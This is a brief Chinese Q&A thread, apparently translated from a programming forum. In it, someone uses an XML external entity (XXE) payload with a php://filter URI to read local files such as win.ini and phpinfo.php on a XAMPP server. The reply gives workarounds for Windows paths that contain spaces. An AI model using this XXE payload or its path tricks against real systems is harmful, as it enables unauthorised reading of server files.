我尝试使用php:// filter / method ..
读取文件我能够读取
之间没有任何空格的路径eg: php://filter/resource=c:/windows/win.ini
但是当我尝试读取有空格的文件路径时,我得到一个空白的回复。
eg: php://filter/resource=C:/Program Files (x86)/xampp/htdocs/xampp/phpinfo.php
我的实际调用是通过XML实体
完成的<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE gpx [<!ENTITY xxe SYSTEM 'php://filter/resource=C:/Program Files (x86)/xampp/htdocs/xampp/phpinfo.php'> ]>
请帮我解决这个问题。
答案 0 :(得分:1)
您有几个选择:
1 - 使用引号:
"C:/Program Files (x86)/xampp/htdocs/xampp/phpinfo.php"
2 - 将短名称用于Program Files (x86):
C:/progra~2/xampp/htdocs/xampp/phpinfo.php